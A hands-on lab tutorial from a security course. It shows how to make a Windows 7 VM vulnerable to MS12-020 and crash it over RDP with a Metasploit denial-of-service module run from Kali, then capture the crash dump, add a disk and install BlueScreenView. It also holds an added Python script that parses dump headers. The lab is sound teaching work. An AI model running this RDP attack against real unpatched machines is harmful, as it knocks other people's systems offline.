Computersecuritystudent Com

This document discusses exploiting a vulnerability in the Remote Desktop Protocol of unpatched Windows systems using Metasploit and Kali Linux. It provides instructions for configuring a Windows 7 virtual machine to be vulnerable, including lowering its memory and enabling crash dumps. The summary then guides using Metasploit on Kali Linux to trigger a crash on the Windows system and analyze the memory dump file.

Uploaded by

Smx IES Badia

Metasploit: MS12-020
Kali 1.0: RDP Windows Exploit, Set Memory Crash Dump File

Section 0. Background Information


1. What is the scenario?
If a Windows machine has not been patched with KB2671387, then it is susceptible to a Denial of
Service (DoS) attack, in which a malicious perpetrator crashes the machine and produces the
notorious Blue Screen of Death (BSOD). This lesson will not only illustrate the attack vector,
but we will also (1) set up a memory crash dump file, (2) capture the crash dump file for later
investigation, (3) add and configure a new Virtual Hard Disk, and (4) install BlueScreenView.

2. What is the Exploit?


The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3,
Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1,
and Windows 7 Gold and SP1 does not properly process packets in memory, which allows
remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to
an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol
Vulnerability."
Reference: http://www.cvedetails.com/cve/2012-0002/

3. What is Metasploit?
The Metasploit Framework is an open source penetration testing tool used for developing and
executing exploit code against a remote target machine. The Metasploit Framework has the world's
largest database of public, tested exploits. In simple words, Metasploit can be used to test the
vulnerability of computer systems in order to protect them, and on the other hand it can also be
used to break into remote systems.

4. What is BlueScreenView?
BlueScreenView scans all your minidump files created during 'blue screen of death' crashes,
and displays the information about all crashes in one table. For each crash, BlueScreenView
displays the minidump filename, the date/time of the crash, the basic crash information
displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver
or module that possibly caused the crash (filename, product name, file description, and file
version).
Reference: http://nirsoft.net/utils/blue_screen_view.html

5. Pre-Requisite Lab
1. Kali: Lesson 1: Installing Kali 1.0
2. Damn Vulnerable Windows 7: Lesson 1: How to create a Damn Vulnerable Windows 7 Machine

6. Lab Notes
In this lab we will do the following:
1. Lower Windows 7 Memory
2. Configure Complete Crash Dump File
3. Illustrate Exploit
4. Post Cleanup Windows Machine
5. Add and Configure 5 GB Virtual Hard Disk
6. Install BlueScreenView

7. Legal Disclaimer
As a condition of your use of this Web site, you warrant to computersecuritystudent.com
that you will not use this Web site for any purpose that is unlawful or that is prohibited
by these terms, conditions, and notices.
In accordance with UCC § 2-316, this product is provided with "no warranties, either
express or implied." The information contained is provided "as-is", with "no guarantee of
merchantability."
In addition, this is a teaching website that does not condone malicious behavior of any
kind.
You are on notice, that continuing and/or using this lab outside your "own" test
environment is considered malicious and is against the law.
© 2016 No content replication of any kind is allowed without express written permission.

Section 1: Start your Windows 7 VM


1. Open VMware Player on your windows machine.
Instructions:
1. Click the Start Button
2. Type "vmware player" in the search box
3. Click on VMware Player

2. Edit Virtual Machine Settings


Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Edit virtual machine settings

3. Configure CD/DVD (IDE)
Instructions:
1. Select CD/DVD (IDE)
2. Click on the Use physical drive: radio button
3. Select Auto detect
Note(FYI):
1. Do not click on the OK Button

4. Configure Memory
Instructions:
1. Select Memory
2. Click on "512 MB"
Note(FYI):
Temporarily lower the amount of memory to 512 MB to limit the size of the crash dump
file that we will later analyze in a subsequent lesson.
5. Configure Network Adapter
Instructions:
1. Select Network Adapter
2. Click the radio button "NAT: Used to share the host's IP address"
3. Click the OK button
Note(FYI):
1. We will use NAT instead of bridged, because of multiple VMware Player issues with
Windows 7 not acquiring an IP Address when using a Wireless connection.
6. Start Damn Vulnerable Windows 7
Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Play virtual machine
Section 2: Login to Windows 7
1. Select Login User
Instructions:
1. Click on Security Student
Note(FYI):
Security Student does belong to the Administrators group.

2. Login as Security Student


Instructions:
1. Supply the student password (abc123).
2. Click on the arrow
Section 3: Configure Remote Settings
1. Open System Panel
Instructions:
1. Click the Windows Start Button
2. Search for System
3. Click System

2. Open Remote Settings


Instructions:
1. Click on Remote settings

3. Configure Remote Settings (Part 1)


Instructions:
1. Remote Assistance:
Check Allow Remote Assistance connections to this computer
2. Remote Desktop
Allow connections from computers running any version of Remote Desktop (less
secure)
3. Click the OK Button

Section 4: Configure Crash Dump


1. Open System Panel(On Damn Vulnerable Windows 7)
Instructions:
1. Click the Windows Start Button
2. Search for System
3. Click System
2. Advanced system settings
Instructions:
1. Click on Advanced system settings

3. Advanced system settings


Instructions:
1. Click on Advanced tab
2. Click the Startup and Recovery Settings Button

4. Complete memory dump


Instructions:
1. Check Write an event to the system log
2. Un-Check Automatically restart
3. Select Complete memory dump
4. Dump file: %SystemRoot%\MEMORY.DMP
5. Check Overwrite any existing file
6. Click the OK button
7. Click the System Properties Restart Message OK Button
Note(FYI):
Step #2: We do not want the endpoint to reboot automatically, because we will later save the
Blue Screen of Death and use the memory addresses it displays in our subsequent memory
investigation.

5. Restart Machine
Instructions:
1. Click the Start Button
2. Click the Arrow next to Shutdown
3. Click Restart
Section 5: Login to Windows 7
1. Select Login User
Instructions:
1. Click on Security Student
Note(FYI):
Security Student does belong to the Administrators group.

2. Switch User
Instructions:
1. Supply the student password (abc123).
2. Click on the arrow
Section 6: Verify you have a Network IP Address
1. Bring up Command Prompt
Instructions:
1. Click the Windows Start Button
2. Type cmd in the search box
3. Click on cmd

2. Record IP Address
Instructions:
1. ipconfig
2. Record your IP Address
Notes(FYI):
1. In my case, my IP Address is 192.168.121.172.
2. In your case, your IP Address will probably be different.
3. Command History
Instructions:
1. echo "MS12_020 RDP DoS Attack"
Notes(FYI):
In the following lesson, we will use Volatility to interrogate and retrieve the command
history: (1) ipconfig and (2) echo "MS12...."

Section 7: Configure Kali Virtual Machine Settings


1. Open VMware Player on your windows machine.
Instructions:
1. Click the Start Button
2. Type "vmware player" in the search box
3. Click on VMware Player

2. Edit Virtual Machine Settings


Instructions:
1. Click on Kali
2. Edit Virtual Machine Settings
Note:
Before beginning a lesson it is necessary to check the following VM settings.
3. Configure CD/DVD
Instructions:
1. Click on CD/DVD (IDE)
2. Click on the radio button "Use physical drive:"
3. Select Auto detect
4. Configure Memory
Instructions:
1. Click on Memory
2. Click on "1 GB"
5. Set Network Adapter
Instructions:
1. Click on Network Adapter
2. Click the radio button "NAT: Used to share the host's IP Address"
3. Click the OK Button

Section 8: Play and Login to Kali


1. Start Up Kali
Instructions:
1. Click on Kali
2. Play virtual machine
2. Supply Username
Instructions:
1. Click Other...
2. Username: root
3. Click the Log In Button
3. Supply Password
Instructions:
1. Password: <Provide your Kali root password>
2. Click the Log In Button

4. Open a Terminal Window


Instructions:
1. Click on Applications
2. Accessories --> Terminal
5. Obtain Kali's IP Address
Instructions:
1. ifconfig
2. Record your IP Address
Note(FYI):
Command #1, Use (ifconfig) to display Kali's IP Address.
Command #2, Record your IP Address.
Mine is 192.168.121.170.
Yours will probably be different.

Section 9: Start msfconsole


1. Make a Forensics Directory
Instructions:
1. mkdir -p /forensics/ms12_020
2. cd /forensics/ms12_020
3. script ms12_020.txt
Notes(FYI):
Command #1, Create a directory named (/forensics/ms12_020). Use the (-p) flag to create
the parent directory if it does not exist. The (-p) flag will also suppress errors if the
directory already exists.
Command #2, Navigate to the (/forensics/ms12_020) directory.
Command #3, Use (script) to record all inputs (commands) and outputs displayed on the
terminal, which will be recorded in file (ms12_020.txt).
2. Start msfconsole
Instructions:
1. msfconsole
Note(FYI):
1. Command #1, The msfconsole provides an "all-in-one" centralized console and
allows you efficient access to virtually all of the options available in the MSF.

3. Search and Use MS12-020


Instructions:
1. search ms12_020
2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Note(FYI):
Command #1, Search Metasploit for any modules that contain the string (ms12_020).
Command #2, Use the MS12-020 Denial Of Service module for Remote Desktop (RDP).

4. Read MS12-020 Description


Instructions:
1. info
2. Read the description
Note(FYI):
Command #1, Use the (info) command to display the Module (Name, Author, Options,
Descriptions and References).
5. Show Options and Set RHOST
Notes(FYI):
Replace (192.168.121.172) with Damn Vulnerable Windows 7 address obtained from
[Section 6, Step 3].
Instructions:
1. show options
2. set RHOST 192.168.121.172
3. show options
Note(FYI):
Command #1, Use (show options) to determine the module requirements. Notice that
the target RHOST address is required.
Command #2, Set RHOST to the IP Address of Damn Vulnerable Windows 7 obtained
from [Section 6, Step 3].
Command #3, Use (show options) to verify that RHOST was set.

6. Exploit RDP
Instructions:
1. exploit
2. exit
3. exit
Note(FYI):
Command #1, Use (exploit) to commence the attack.
Command #2, Exit from the msfconsole.
Command #3, Exit from script.
Section 10: Save Blue Screen of Death Screenshot
1. Save a Screenshot (On Damn Vulnerable Windows 7)
Instructions:
1. Press <Ctrl> and <Alt>
2. Press <PrtScn>
3. Paste into MS Paint
4. Save MS Paint File
Note(FYI):
It is very important you save this screen for the subsequent memory analysis lesson that
we will conduct for this particular attack vector.
2. Shut Down Damn Vulnerable Windows 7
Instructions:
1. Player --> Power --> Shut Down Guest
2. Select Yes

Section 11: Post Clean Up and Add Virtual Hard Disk


1. Open VMware Player on your windows machine.
Instructions:
1. Click the Start Button
2. Type "vmware player" in the search box
3. Click on VMware Player

2. Edit Virtual Machine Settings


Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Edit virtual machine settings
3. Add Hard Disk
Instructions:
1. Click the Add... button
2. Click the Hard Disk
3. Click the Next button
4. Select a Disk
Instructions:
1. Select Create a new virtual disk
2. Click the Next button
5. Select a Disk Type
Instructions:
1. Select the IDE radio button
2. Click the Next button

6. Specify Disk Capacity


Instructions:
1. Maximum disk size (GB): 5.0
2. Click on the Store virtual disk as a single file radio button
3. Click the Next button
Note(FYI):
We are creating a 5.0 GB Virtual Hard Drive for the subsequent corresponding memory
analysis lesson.
7. Specify Disk File
Instructions:
1. Disk file: FORENSICS.vmdk
2. Click the Finish button
8. Configure CD/DVD (IDE)
Instructions:
1. Select CD/DVD (IDE)
2. Click on the Use physical drive: radio button
3. Select Auto detect
Note(FYI):
Do not click on the OK Button

9. Configure Memory
Instructions:
1. Select Memory
2. Click on "1 GB"
Note(FYI):
Do not click on the OK Button
Earlier, we lowered the amount of memory to 512 MB to limit the size of the crash dump
file. Now that we have the crash dump file, we can set the memory used back to the
recommended requirement.
10. Configure Network Adapter
Instructions:
1. Select Network Adapter
2. Click the radio button "NAT: Used to share the host's IP address"
3. Click the OK button
Note(FYI):
We will use NAT instead of bridged, because of multiple VMware Player issues with
Windows 7 not acquiring an IP Address when using a Wireless connection.
11. Start Damn Vulnerable Windows 7
Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Play virtual machine
12. Windows Error Recovery
Instructions:
1. Arrow Down to Start Windows Normally
2. Press <Enter>

Section 12: Login to Windows 7


1. Select Login User (On Damn Vulnerable Windows 7)
Instructions:
1. Click on Security Student
Note(FYI):
Security Student does belong to the Administrators group.

2. Login as Security Student


Instructions:
1. Supply the student password (abc123).
2. Click on the arrow

3. Windows Recovery Message


Instructions:
1. Click the Cancel Button
Note(FYI):
We will investigate the unexpected shutdown in a subsequent lesson.

4. Open Command Prompt


Instructions:
1. Click the Start Button
2. Search for command prompt
3. Click on the Command Prompt

5. Verify Crash Dump File


Instructions:
1. cd C:\Windows
2. dir MEMORY.DMP
Note(FYI):
Command #2, Verify that the memory dump file exists. Notice that the file size of the
MEMORY.DMP file is 512 KB.
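As an added example (not part of the original lesson), the following Python script reads the header of a MEMORY.DMP like the one verified above and reports the dump type and the bug check code and four parameters that BlueScreenView displays in Section 14. It follows the documented DUMP_HEADER32/DUMP_HEADER64 field offsets (the same ones Volatility's crash dump support reads); the header produced by build_sample_header is constructed test data, not values from this lab's crash.

```python
import struct

# Field offsets from the Windows crash dump header layouts (DUMP_HEADER32 and
# DUMP_HEADER64).  The header occupies the first 0x1000 (32-bit) or 0x2000
# (64-bit) bytes of MEMORY.DMP; the bug check code and its four parameters are
# the same values a blue screen shows and BlueScreenView lists per crash.
LAYOUTS = {
    b"DUMP": dict(bits=32, size=0x1000, code_off=0x28, param_off=0x2C,
                  param_fmt="<4I", type_off=0xF88),
    b"DU64": dict(bits=64, size=0x2000, code_off=0x38, param_off=0x40,
                  param_fmt="<4Q", type_off=0xF98),
}
# DumpType values: 1 = complete memory dump (what Section 4 configured)
DUMP_TYPE_NAMES = {1: "complete", 2: "kernel", 5: "bitmap (automatic/active)"}


def parse_dump_header(data: bytes) -> dict:
    """Return architecture, dump type and bug check info from a dump header."""
    if len(data) < 0x1000 or data[0:4] != b"PAGE":
        raise ValueError("not a Windows crash dump: missing PAGE signature")
    layout = LAYOUTS.get(data[4:8])
    if layout is None:
        raise ValueError("unknown ValidDump marker %r" % data[4:8])
    (code,) = struct.unpack_from("<I", data, layout["code_off"])
    params = struct.unpack_from(layout["param_fmt"], data, layout["param_off"])
    (dump_type,) = struct.unpack_from("<I", data, layout["type_off"])
    return {
        "bits": layout["bits"],
        "dump_type": DUMP_TYPE_NAMES.get(dump_type, "unknown (%d)" % dump_type),
        "bug_check_code": code,
        "parameters": list(params),
    }


def format_bug_check(info: dict) -> str:
    """Render the STOP line the way the blue screen and BlueScreenView print it."""
    width = 8 if info["bits"] == 32 else 16
    params = ", ".join("0x%0*X" % (width, p) for p in info["parameters"])
    return "STOP: 0x%08X (%s)" % (info["bug_check_code"], params)


def build_sample_header(bits: int, code: int, params) -> bytes:
    """Constructed sample header for offline testing; the values are made up."""
    marker = b"DUMP" if bits == 32 else b"DU64"
    layout = LAYOUTS[marker]
    buf = bytearray(layout["size"])
    buf[0:4] = b"PAGE"
    buf[4:8] = marker
    struct.pack_into("<I", buf, layout["code_off"], code)
    struct.pack_into(layout["param_fmt"], buf, layout["param_off"], *params)
    struct.pack_into("<I", buf, layout["type_off"], 1)  # 1 = complete memory dump
    return bytes(buf)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                  # e.g. python dumphdr.py MEMORY.DMP
        with open(sys.argv[1], "rb") as f:
            data = f.read(0x2000)
    else:                                  # constructed sample, not a real dump
        data = build_sample_header(32, 0x0000001E, (0xC0000005, 0x82A1B2C3, 0, 0))
    info = parse_dump_header(data)
    print("%d-bit %s dump: %s" % (info["bits"], info["dump_type"], format_bug_check(info)))
```

Run against C:\Windows\MEMORY.DMP to confirm it really is a complete dump before copying it off for analysis; a file that lacks the PAGE/DUMP signature is not a usable crash dump.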
Section 13: Configure Hard Drive
1. Open Computer Management (On Damn Vulnerable Windows 7)
Instructions:
1. Click the Start button
2. Search for computer management
3. Click on Computer Management
Note(FYI):
Although we created a Virtual Hard Disk, we need to tell the Windows Operating System
to (1) initialize it, (2) create a simple volume, (3) label it, (4) specify the size, and (5) assign
a drive letter.

2. Initialize Disk
Instructions:
1. Click on Disk Management
2. Check Disk 1
3. Select MBR (Master Boot Record)
4. Click the OK Button
3. Create New Simple Volume...
Instructions:
1. Right Click on 5.0 GB Unallocated
2. Click on New Simple Volume...

4. New Simple Volume Wizard


Instructions:
1. Click the Next button
5. Specify Volume Size
Instructions:
1. Simple volume size in MB: 5117
2. Click the Next button

6. Assign Drive Letter or Path


Instructions:
1. Click on Assign the following drive letter radio button
2. Select drive letter Z
3. Click the Next button

7. Format Partition
Instructions:
1. Click the Format this volume with the following settings: radio button.
2. File system: NTFS
3. Allocation unit size: Default
4. Volume label: FORENSICS
5. Check Perform a quick format
6. Click the Next button
8. Completed New Simple Volume Wizard
Instructions:
1. Click the Finish button

Section 14: Download NirSoft BlueScreenView


1. Download BlueScreenView (On Damn Vulnerable Windows 7)
Instructions:
1. Navigate to the following Address
http://www.nirsoft.net/utils/bluescreenview.zip
2. Click the Save File radio button
3. Click the OK button
2. Choose Download Location
Instructions:
1. Navigate to Download Directory
Z:\
2. Filename: bluescreenview
3. Click the Save button

3. Open Containing Folder


Instructions:
1. Tools --> Downloads
2. Right Click on bluescreenview.zip
3. Click on Open Containing Folder

4. Extract bluescreenview
Instructions:
1. Right Click on bluescreenview
2. Hover over 7-Zip
3. Click on Extract to "bluescreenview\"
5. Open bluescreenview folder
Instructions:
1. Right Click on bluescreenview
2. Click on Open

6. Run BlueScreenView
Instructions:
1. Right Click on BlueScreenView
2. Click on Open
7. User Account Control
Instructions:
1. Click the Yes button

8. Display Blue Screen in XP Style


Instructions:
1. Option --> Lower Pane Mode --> Blue Screen in XP Style
9. Select All Blue Screen Text
Instructions:
1. Right Click in the Blue Screen Frame
2. Click Select All

10. Copy Blue Screen Text


Instructions:
1. Right Click in the Blue Screen Frame
2. Click Copy
11. Open Notepad
Instructions:
1. Click the Start Button
2. Search for notepad
3. Click on Notepad

12. Paste Blue Screen Text


Instructions:
1. Edit --> Paste
13. Save File (Part 1)
Instructions:
1. File --> Save As...

14. Save File (Part 2)


Instructions:
1. Navigate to the following directory
Z:\bluescreenview
2. File name: rdp_ms12_020.txt
3. Click the Save Button
Note(FYI):
We will use this blue screen information for a subsequent memory analysis lesson.
Section 15: Proof of Lab
1. Open a Terminal Window (On Kali)
Instructions:
1. Click on Applications
2. Accessories --> Terminal

2. Proof of Lab
Instructions:
1. cd /forensics/ms12_020
2. grep -i rhost ms12_020.txt
3. grep -i send ms12_020.txt
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Note(FYI):
Command #1, Change directory to /forensics/ms12_020.
Command #2, Use the command (grep) to display only lines that contain the string
(rhost) in the script file (ms12_020.txt). Use the (-i) flag to ignore case for the string
(rhost).
Command #3, Use the command (grep) to display only lines that contain the string
(send) in the script file (ms12_020.txt). Use the (-i) flag to ignore case for the string
(send).
Proof of Lab Instructions:
1. Do a PrtScn
2. Paste into a word document
3. Upload to Moodle
